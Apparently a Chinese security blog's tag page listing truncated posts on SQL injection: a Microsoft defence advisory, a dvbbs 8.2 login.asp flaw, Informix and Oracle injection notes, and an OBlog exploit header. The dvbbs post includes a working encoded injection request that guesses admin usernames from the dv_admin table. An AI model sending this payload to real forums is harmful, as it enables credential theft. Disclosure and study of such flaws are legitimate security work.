微软安全小组公布反制SQL注入的方案
来源:cnbeta
微软安全隐患研究和防御小组发表文章称已经注意到SQL注入攻击方式发展愈演愈烈,黑客通过SQL数据库对网站进行非法入侵并修改页面,同时页面上还会被加入恶意软件,持续影响一些网络应用程序,因此他们针对不同的人群(ITPro,最终用户,Web开发者)提供了一系列不同的方案,将资料列出供您参考.
Tags: SQL Injection, SQL注入, 微软来源:cnbeta
微软安全隐患研究和防御小组发表文章称已经注意到SQL注入攻击方式发展愈演愈烈,黑客通过SQL数据库对网站进行非法入侵并修改页面,同时页面上还会被加入恶意软件,持续影响一些网络应用程序,因此他们针对不同的人群(ITPro,最终用户,Web开发者)提供了一系列不同的方案,将资料列出供您参考.
Tags: SQL Injection, SQL注入, 微软鬼仔注:这次来个详细的。
by where([email protected])
漏洞描述:
中国应用最广泛的论坛程序,最新dvbbs8.2的注入漏洞0day 包括官方版本在内的access及sql版本。漏洞存在源程序 login.asp
Login.asp 程序在检查隐藏值user用户名的登陆时没有过滤特殊符号,导致可以利用sql注入方式猜解出论坛管理员及所有用户的密码或者执行其它高级的sql语句直接威胁到服务器安全。
漏洞等级:
高危
阅读全文 »
来源:80sec
漏洞公告:http://seclists.org/bugtraq/2008/May/0330.html
利用方式:一个典型的sql注射漏洞,按照公告里说的用
password=123123&codestr=71&CookieDate=2&userhidden=2&comeurl=index.asp&submit=%u7ACB%u5373%u767B%u5F55&ajaxPost=1&username=where%2527%2520and%25201%253D%2528select%2520count%2528*%2529%2520from%2520dv_admin%2520where%2520left%2528username%252C1%2529%253D%2527a%2527%2529%2520and%2520%25271%2527%253D%25271
就可触发.
阅读全文 »
来源:seclists
email:
hackerb_at_hotmail.com
Subject:
dvbbs8.2(access/sql)version login.asp remote sql injection
danger level:
critical/High
info:
dvbbs is prone to multiple sql injection security flaw
阅读全文 »
Author:poison/amxku 个人拙见
前些时间做一个渗透测试,数据库是informix的。整理了一下。
informix数据类型比较复杂,在union查询中最郁闷的就是匹配字段的问题
数据类型如下
阅读全文 »
原PAPER地址:
http://www.databasesecurity.com/dbsec/lateral-sql-injection.pdf
author : kj021320
team : I.S.T.O
最近忙啊忙啊的,今天终于有点点时间抽出来看看技术文章了,最近国外又出了关于新型ORA注入技术的PAPER,赶紧测试,主要是出现在SQL语句字符拼 接的时候,DATE类型转换为VARCHAR 以及 NUMBER转换为VARCHAR加入的格式字符出现问题。 阅读全文 »
Tags: Oracle, SQL Injection, SQL注入官方已经修正该漏洞。
–==+=================== www.nspcn.org =================+==–
–==+ OBlog (tags.asp) Remote SQL Injection Exploit +==–
–==+====================================================================================+==–
#Author: Whytt & Tr4c3[at]126[dot]com
#版权所有:http://www.nspcn.org & [BK瞬间群] & Whytt
#漏洞文件tags.asp
阅读全文 »